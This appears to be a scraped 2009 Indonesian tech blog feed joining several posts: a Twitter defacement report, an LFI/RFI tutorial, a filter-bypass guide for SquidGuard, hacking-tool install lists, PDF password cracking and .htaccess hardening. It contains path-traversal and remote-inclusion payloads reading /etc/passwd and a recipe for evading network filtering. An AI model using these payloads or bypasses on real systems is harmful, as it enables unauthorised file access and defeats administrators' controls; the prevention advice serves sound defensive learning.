Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

iRANiAN.CYBER.ARMY@GMAIL.COM

U.S.A. Think They Controlling And Managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?

WE PUSH THEM IN EMBARGO LIST

Take Care.

Dengan adanya serangan deface ini , status.twitter.com beserta sub domainnya pun lumpuh total dan pastinya pengguna Twitter tidak dapat mengakses akun mereka. Namun kejadian ini tidak berlangsung lama, pihak Twitter telah berhasil memulihkannya seperti semula sehingga para penggunanya bisa kembali mengakses akun mereka. Mekanisme serangannya pun diduga bahwa sekelompok hacker itu telah mengalihkan DNS Twitter ke sebuah halaman yang sudah mereka siapkan seperti pada gambar diatas.

Pihak Twitter sendiri tidak ingin berspekulasi bahwa serangan itu benar-benar dilakukan oleh orang Iran, namun jika tuduhan itu cukup logis jika dikaitkan dengan konflik yang terjadi di Iran selama pemilu tahun 2009 yang terjadi di Iran dimana Twitter telah menjadi alat untuk melancarkan aksi protest sekelompok warga Iran.

Setelah Koobaface dan varian terbarunya, kemudian phising, sekarang deface, besok apalagi ya?

Namun dibalik kehandalannya pernahkah Anda lupa dengan password root MySQL Anda?Jika Anda mengalami hal seperti ini, jangan panik dahulu. Apalagi sampai menginstal ulang MySQL Anda. Berikut cara mereset password root MySQL Anda, sistem yang digunakan yaitu Linux distro Ubuntu :

1. Buka 2 console atau terminal Anda, bisa dengan kombinasi Ctrl+Alt+F1( console 1), Ctrl+Alt+F2(console 2), dst.

2. Pada console 1, matikan service MySQL Anda, dengan mengetik perintah :

$sudo /etc/init.d/mysql stop

3. Pada console 2 aktifkan kembali service MySQL dengan option -–skip-grant-tables, dengan mengetik perintah:

$sudo mysqld –skip-grant-tables

4. Balik ke console 1, jalankan MySQL client dengan mengetik perintah:

$mysql

5. Pilih database mysql

mysql> use mysql;

6. Kemudian ubah password root dengan melakukan query sebagai berikut:

mysql> update user set Password=password(‘password_baruku’) where User= ‘root’;

7. Lakukan flush privileges:

mysql> flush privileges;

8. Kembali ke console 1 matikan service MySQL dengan cara:

$sudo killall mysqld

9. Jalankan kembali service MySQL pada console 1 dengan cara:

$/etc/init.d/mysql start

Mudah-mudahan bermanfaat.

RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan

Fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Kode:

include();

include_once();

require();

require_once();

Dengan syarat pada konfigurasi php di server:

allow_url_include = on

allow_url_fopen = on

magic_quotes_gpc = off

contoh:

misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:

<?php

include “../$_GET[imagefile]“;

?>

misal $imagefile=image.php

mungkin di url akan terlihat seperti ini bentuknya

Code:

http://www.[target].com/index.php?imagefile=image.php

maka script ini akan menampilkan halaman image.php.

Disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.

Misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah “../” itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target.

Tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2

Ternyata pada passwd ditambah dengan extensi “.php” berarti code yang digunakan untuk include adalah seperti ini:

Kode:

<?php

include($_GET[imagefile].”.php”);

?>

Untuk dapat mengelabui script tersebut kita bisa menggunakan %00 (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan %00 seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd%00

lalu untuk apa %00? yaitu untuk menghilangkan karakter apapun setelah passwd.

* %00 ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi “hacked by H4CK3R”

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.

Pencegahan

Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu

1. Memvalidasi variable.

2. Mengkonfigurasi kembali settingan php pada server website Anda.

allow_url_include = off

allow_url_fopen = off

magic_quotes_gpc = on

3. pada include mungkin bisa ditambahkan “./”

jadinya seperti ini,

Code:

include(“./”$_GET[imagefile].”.php”);

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Sementara Facebook juga mengalami gangguan yang sama di Kamis pagi. “Tidak ada data pengguna yang terinfeksi dan kami sudah me-restore full akses ke situs Facebook untuk user. Namun, kami juga tetap memantau situasi.” ungkap juru bicara Facebook, Brandee Barker. Sementara itu, serangan yang sama juga menimpa website Google, namun Google berhasil menangkisnya. “System Google mampu mencegah adanya serangan yang berimbas kepada layanan kami. Kemudian kami mengajak perusahaan lain yang terkena DDoS untuk menangani serangan tersebut.” ungkap juru bicara Google, Nate Tyler. Untuk itu, Facebook, Twitter dan Google kemudian bekerja sama untuk menginvestigasi serangan DDoS tersebut.

DDoS sendiri merupakan serangan dari hacker yang menggunakan beberapa computer ‘zombie’ yang terinfeksi dengan virus, yang dikomando untuk mengunjungi sebuah website secara bersamaan. Akibatnya adalah dapat mengganggu server website, memperlambat kinerja layanan atau mematikan website. Serangan DDoS menghampiri Twitter sekitar pukul 6:00 am waktu local dan menyebabkan layanan tersebut down secara temporer. Kemudian akses ke website Twitter menjadi lambat dan memberikan pesan kepada user bahwa koneksi sedang ‘timed out’ karena Twitter terlalu lama merespon.

Berikut bahan-bahan yang dibutuhkan :

1. Kabel USB biasa, standard aja yang 1m atau 0.5m.

2. Kabel LAN / kabel UTP buat jaringan.

Langkah 1 :

Kabel USB dites dulu menggunakan USB flashdisk di komputer, masih berfungsi atau tidak. Kalau masih OK, potong jadi 2 bagian. Biasanya ada warna merah, hitam, dan putih, hijau. Merah dan hitam biasanya untuk tegangan daya 5V. Hijau putih biasanya merupakan kabel data USB.

Langkah 2 :

Potong dan kupas ujung-ujung kabel LAN. Dari kabel LAN ini ada 8 warna. Dari 8 ujung kabel LAN tadi, gabungkan beberapa pasang sehingga tinggal 4 ujung kabel LAN.

* gabungkan kabel putih oranye dengan oranye (2 kabel jadi 1)

* kabel putih hijau (1 kabel)

* kabel hijau (1 kabel)

* kemudian gabungkan kabel putih biru, biru, putih coklat, coklat (4 kabel jadi 1)

Langkah 3 :

Sambung ujung-ujung kabel USB dengan ujung kabel LAN sbb :

* putih oranye – oranye (2 kabel) (UTP) = merah (USB)

* putih hijau (1 kabel) (UTP) = putih (USB)

* hijau (1 kabel) (UTP) = hijau (USB)

* putih biru, biru, putih coklat, coklat (4 kabel) (UTP) = hitam (USB)

Pastikan masing-masing sambungan di isolasi pakai selotip dengan rapat

Langkah 4 :

Merupakan langkah yang paling penting : set USB port speed pada motherboard komputer agar menjadi USB 1.1, jangan USB 2.0. USB 1.1 punya kecepatan maksimum 10Mbps, jadi lebih reliable untuk di tarik jarak jauh dibandingkan dengan USB 2.0.

Wireshark – Network Traffic Analyzer

Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.

Install wireshark:

Buka terminal (seperti command prompt di windows), lalu ketikkan

#sudo aptitude install wireshark

Nessus – Remote Network Security Auditor

Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.

Install NESSUS:

#sudo apt-get install nessus

NMAP – The Network Mapper

Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.

Install NMAP:

#sudo apt-get install nmap

Etherape – Graphical Network Monitor Modeled after Etherman

Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.

Install Etherape:

#sudo apt-get install etherape

Kismet

Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.

Install Kismet:

#sudo apt-get install kismet

Chkrootkit – Checks for signs of rootkits on the local system

Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:

1. lrk3, lrk4, lrk5, lrk6 (and some variants);

2. Solaris rootkit;

3. FreeBSD rootkit;

4. t0rn (including latest variant);

5. Ambient’s Rootkit for Linux (ARK);

6. Ramen Worm;

7. rh[67]-shaper;

8. RSHA;

9. Romanian rootkit;

10. RK17;

11. Lion Worm;

12. Adore Worm.

Install Chkrootkit:

#sudo apt-get install chkrootkit

Rkhunter – Rootkit, backdoor, sniffer and exploit scanner

Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.

Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:

- MD5 hash changes;

- files commonly created by rootkits;

- executables with anomalous file permissions;

- suspicious strings in kernel modules;

- hidden files in system directories;

Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.

Install Rkhunter:

#sudo apt-get install rkhunter

TCPDump – A powerful tool for network monitoring and data acquisition

Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.

Instal TCPDump:

#sudo apt-get install tcpdump

SNORT – Flexible Network Intrusion Detection System

Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.

Instal Snort:

#sudo apt-get install snort

Firestarter – program for managing and observing your firewall

Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.

Instal firestarter:

#sudo apt-get install firestarter

CLAMAV – anti-virus utility for Unix

Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:

- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya

- seluruh format file mail

- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.

Instal Clamav:

#sudo apt-get install clamav

Netcat – TCP/IP swiss army knife

Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.

Instal Netcat:

#sudo apt-get install netcat

John

Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.

Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.

Instal John the Ripper:

#sudo apt-get install john

Dnsniff – Various tools to sniff network traffic for cleartext insecurities

Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.

Sub-sub tools itu adalah berikuti ini:

* arpspoof – Send out unrequested (and possibly forged) arp replies.

* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.

* dsniff – password sniffer for several protocols.

* filesnarf – saves selected files sniffed from NFS traffic.

* macof – flood the local network with random MAC addresses.

* mailsnarf – sniffs mail on the LAN and stores it in mbox format.

* msgsnarf – record selected messages from different Instant Messengers.

* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

* sshow – SSH traffic analyser.

* tcpkill – kills specified in-progress TCP connections.

* tcpnice – slow down specified TCP connections via “active” traffic shaping.

* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.

* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.

* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

Install dsniff:

#sudo apt-get install dsniff

]]> http://adhit.web.id/security-hacking-tools-di-ubuntu/feed/ 23 http://adhit.web.id/membuka-dokumen-pdf-yang-diproteksi-dengan-password/ http://adhit.web.id/membuka-dokumen-pdf-yang-diproteksi-dengan-password/#comments Thu, 25 Jun 2009 15:56:26 +0000 adhit http://adhit.web.id/?p=75 Ada beberapa alasan mendasar untuk membuka file PDF yang terproteksi. Anda mungkin ingin membuka dokumen PDF yang terenkripsi tapi lupa passwordnya seperti kasus dibawah.

Misalkan rekan kerja Anda membuat laporan penjualan dalam format PDF, tapi dia tidak lagi bekerja di perusahaan tempat Anda bekerja.

Ada dua tipe dasar dalam proteksi PDF – pembuat PDF asli dapat membatasi membuka file PDF dan membatasi orang lain untuk memodifikasi, mencetak, atau menyalin teks dan grafik dari file PDF tersebut. Berikut beberapa kemungkinan yang dapat dilakukan:

Jika itu adalah pembatasan untuk menyalin atau mencetak.

Buka dokumen dalam Acrobat Reader atau Foxit dan capture halaman PDF sebagai image. Atau jika terdapat lebih dari satu halaman, Anda bisa menggunakan SnagIt karena dapat melakukan autoscroll dan capture banyak halaman dalam satu operasi.

Sebagai alternatif, Anda bisa berinvestasi pada program komersial seperti Advanced PDF Password Recovery dari ElcomSoft dan PDF Password Remover dari Very PDF.

(Utilitas ini tidak mencari password untuk Anda, hanya menghilangkan batasan-batasan dari file yang diproteksi password)

Jika itu adalah pembatasan membuka dokumen.

Ini adalah kasus paling sulit dan tidak ada solusi untuk membaca dokumen PDF yang di proteksi dengan password pada level Open.

Software yang bisa digunakan adalah yang memakai metode seperti Brute Force, Key Search dan Dictionary Attack untuk menebak password-nya. Mereka akan mencoba menggunakan semua kemungkinan kombinasi karakter sebagai password dan juga proses ini akan memakan waktu berjam-jam bahwah berhari-hari tergantung dari kecepatan komputer yang digunakan.

Advanced PDF Password Recovery Professional Edition dari ElcomSoft direkomendasikan sebagai pilihan. Jika password ditemukan, program akan memperlihatkannya, begitu juga jumlah passowrd yang telah digunakan untuk testing.

Isu Legalitas : – Anda mungkin terkejut mengetahui bahwa software PDF password cracking ini adalah legal dan bahkan Microsoft mememberikan status untuk ElcomSoft sebagai Gold Certified Partner.

Adapun teknik ACL dan Squidguard hanya mengandalkan filtering dari 2 sisi. Yang pertama yakni blokir berdasarkan url, dan kedua blokir berdasarkan keyword yang terkandung dalam url. Nah disinilah kelemahan utamanya. Cukup dengan memodifikasi keyword atau url suatu website, kita dapat dengan mudah mengelabui dan menipu aplikasi filtering. (Lihat ilustrasi dibawah ini)

Mekanisme SquidGuard

Dalam ilustrasi diatas digambarkan komputer user terhubung ke internet melalui SquidGuard. Seluruh web yg akan dibuka di sensor dulu oleh si Squid Quard ini. Berhubung situs sosial yang lagi populer yaitu facebook.com, maka saya mengganti alamat friendster.com menjadi facebook.com. Terlihat disana si admin memblokir akses ke situs facebook.com. Ketika user membuka alamat tersebut maka yang didapatnya adalah error. Tak habis akal si user mencoba mengaksesnya dengan alamat http://1161801868/ . Lho facebook.com bisa dibuka!

Bagaimana logikanya? Sebenarnya yang diakses oleh si user itu adalah alamat IP dari facebook dalam bentuk bilangan DWORDS. Bagaimana cara untuk mengetahui IP facebook? Cara termudah yakni dengan melakukan tes ping. Namun tentu saja ping tidak akan bisa dilakukan bila facebook atau IP realnya sendiri di blokir. Untuk itu kita bisa mengakali dengan minta bantuan web web yang menyediakan jasa ping gratisan. Cari saja dengan google, kata kuncinya “Free ping services”. Salah satu contohnya :

http://network-tools.com/

Contoh request ping nya seperti ini:

http://network-tools.com/default.asp?prog=ping&host=facebook.com

Wew GAGAL! rupanya si SquidGuard otomatis memblokir semua url yang mengandung kata facebook.com. Bisa dicounter? Mudah kita ubah saja facebook.com menjadi bentuk hexa-nya.

Caranya? Gunakan saja tools hasil searching di google (Ascii to hex translator) seperti ini:

http://converter.adhit.web.id/

Hasilnya facebook.com = %66%61%63%65%62%6F%6F%6B%2E%63%6F%6D

jadi request pingnya menjadi:

http://network-tools.com/default.asp?prog=ping&host=%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D

dan seperti yang diharapkan ip facebook didapatkan: 69.63.176.140

Tentu saja IP ini ga bisa langsung dimasukkan dalam url berhubung IP ini udah keduluan di blokir Langkah selanjutnya yakni dengan memalsukan IP ini dalam bentuk bilang DWORDS. Selain DWORDS bisa juga diconvert dalam bentu hex dan octa. Hal ini karena tidak selalu IP yang di convert dalam bentuk dwords requestnya di balas oleh server penerima.

Caranya kita bisa gunakan tools converter sederhana seperti di sini:

http://converter.adhit.web.id/

Didapatkan facebook.com sama dengan:

* http://1161801868

* http://0×45.0x3f.0xb0.0x8c

* http://0105.0077.0260.0214

Untuk mengubah IP ke dalam bentuk bilangan hex atau oct anda bisa juga memanfaatkan google. caranya cukup masukkan di kolom search seperti ini (209 ke dalam bentuk hex):

http://www.google.co.id/search?q=69+in+hex

hasilnya:

69 = 0×45

Selanjutnya tinggal anda gabung gabungkan saja dan dipisahkan dengan notasi titik (.) dan tentunya facebook.com disini hanyalah salah satu contoh dalam ilustrasinya, dan Anda juga dapat mengunakannya terhadap alamat-alamat situs lainnya.

Ilustrasi pemanfaatan web proxy untuk mem-bypass filtering

Anda cukup membuka situs tersebut lewat bantuan perantara web proxy (lihat gambar diatas). Maksudnya web proxy, adalah layanan web yang memungkinkan Anda meminta kepada situs web proxy tersebut untuk men download kan tampilan situs yang Anda inginkan. Selanjutnya hasilnya di kirimkan kembali ke layar browser Anda. Jadi istilahnya anda membuka situs target lewat perantara. Misalnya Anda dapat mengakses situs yang Anda inginkan melalui a1proxy.co.cc seperti pada gambar berikut ini, Anda tinggal memasukkan alamat situs yang ingin Anda buka.

a1proxy.co.cc web proxy

Penggunaan web proxy juga berguna menyembunyikan IP Address Anda. Selain itu Anda juga bisa memanfaatkan situs-situs yang menawarkan php web proxy. Sekali lagi anda bisa manfaatkan google untuk mencarikannya. Keywordnya: “PHP Web Proxy”

Selamat browsing..

Security

Berikut beberapa tips security yang dapat kita gunakan dengan file htaccess:

Mencegah Mengakses File .htaccess

File .htaccess merupakan file yang sangat penting bagi website kita. File ini harus diberikan security agar tidak dapat diakses oleh orang lain. Ketika ada yang mengakses file .htaccess biasanya akan timbul pesan error 403. Itu disebabkan karena setting permissionnya didalam server hosting telah menggunakan CHMOD 644, yang mengakibatkan file ini tidak dapat diakses oleh publik. Tetapi jika kita ingin menambahkan security pada file .htaccess kita dapat menambahkan kode berikut:

# security file htaccess
<Files .htaccess>
order allow,deny
deny from all
</Files>

Mencegah Mengakses File Khusus

Untuk mencegah agar pengunjung website tidak dapat mengakses file-file khusus, kita dapat menambahkan beberapa kode dalam file .htaccess, dengan menspesifikasikan nama file tersebut.

# mencegah melihat file khusus
<files secretfile.jpg>
order allow,deny
deny from all
</files>

Arti dari kode tersebut adalah bahwa file secretfile.jpg telah diblok dan tidak dapat dilihat atau diakses oleh pengunjung.

Mencegah Mengakses Beberapa Tipe File

Untuk mencegah pengunjung web agar tidak dapat mengakses beberapa tipe file khusus, kita dapat menambahkan kode pada file .htaccess sebagai berikut:

<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>

Arti dari kode tersebut adalah bahwa file yang berekstension htaccess, htpasswd, ini, phps, fla, psd, log dan sh telah di blok dan tidak dapat dilihat atau diakses oleh pengunjung secara langsung.

Mencegah Browsing Direktori

Jika dalam direktori di server hosting kita tidak terdapat ada index-nya, maka pengunjung akan dapat mengakses dan browsing ke dalam server hosting kita pada saat mengakses direktori tersebut. Demi keamanan website kita, hal ini harus kita cegah dengan menambahkan beberapa kode kedalam file .htaccess

# disable directory browsing
Options All -Indexes

Kebalikannya, untuk mengaktifkan agar dapat browsing ke direktori, kita dapat gunakan kode:

# enable directory browsing
Options All +Indexes

Jika ingin mencegah untuk melihat daftar dari isi direktori kita dapat gunakan kode:

# mencegah melihat isi direktori / folder
IndexIgnore *

Jika kita ingin mencegah untuk tipe-tipe file tertentu kita dapat menambahkan kode:

# mencegah menampilkan tipe file tertentu dalam direktori
IndexIgnore *.wmv *.mp4 *.avi *.etc

Mengganti Default Halaman Index

Halaman index kadang menjadi sasaran untuk dibobol / dihack oleh orang lain, jika dirasa sangat perlu demi keamanan website, kita dapat mengganti halaman index dengan menggunakan nama file lain. Misalkan kita ingin mengganti halaman index dengan menggunakan nama file “bisnis.html”, maka kita dapat menambahkan kode pada file .htaccess sebagai berikut:

# mengganti halaman index
DirectoryIndex bisnis.html

Untuk mengganti urutan dari halaman index, kita dapat menggunakan kode berikut:

# Mengubah urutan halaman index
DirectoryIndex namafile.html index.cgi index.pl default.htm

Membuat Redirect pada saat memperbaiki atau mengupdate website.

Jika kita ingin memperbaiki website, entah itu saat mengganti desain website atau memperbaiki kerusakan-kerusakan yang lain, sehingga pada saat orang lain mengunjungi website kita masih terlihat adanya kerusakan pada website. Bagi seorang webmaster, hal tersebut haruslah dihindari karena untuk menjaga keprofesionalan dari website tersebut. Untuk menghindarinya kita dapat mengarahkan pengunjung secara langsung dengan melakukan redirect kehalaman lain, dimana halaman tersebut dapat berisi pesan bahwa website yang kita kelola tersebut masih diperbaiki.

Untuk melakukan redirect kita dapat menambahkan beberapa kode kedalam file .htaccess, sebagai berikut :

order deny,allow
deny from all
allow from 123.123.123.123

ErrorDocument 403 /page.html

<Files page.html>
allow from all
</Files>

Kita harus mengganti 123.123.123.123 dengan IP address dari komputer kita agar kita masih dapat melihat perubahan yang terjadi sebelum untuk konsumsi publik. Kita juga harus mengganti page.html dengan nama file halaman sesuai dengan file yang kita buat. File ini adalah halaman yang dilihat pengunjung saat kita melakukan perbaikan.

Setelah perbaikan dianggap selesai kita harus menghapus kembali kode diatas agar pengunjung dapat menikmati kembali website kita.

Menampilkan Halaman Error 404

Pada saat pengunjung website melihat suatu alamat URL dalam website kita tetapi alamat tersebut tidak ada dalam website maka didalam browser akan muncul pesan error yaitu “404 File Not Found“. Agar kelihatan lebih profesional website kita, pesan error ini dapat kita ganti dengan sebuah halaman yang kita definisikan sendiri pesannya, dengan cara menambahkan kode pada file .htaccess sebagai berikut:

ErrorDocument 404 /404.html

Kita dapat mengganti 404.html sesuai dengan nama file yang kita buat. Jadi saat terjadi error 404, pengunjung akan melihat halaman file tersebut.

Memindah atau Mengganti Nama File

Jika kita pernah memindah atau mengganti nama halaman dalam website kita, maka kita wajib melakukan Redirect agar pengunjung yang melihat halaman yang lama dapat langsung mengarah melihat halaman yang baru. Untuk melakukan itu dapat dilakukan dengan menambahkan kode pada file .htaccess sebagai berikut:

Redirect 301 /lama.html http://domainanda.com/baru.html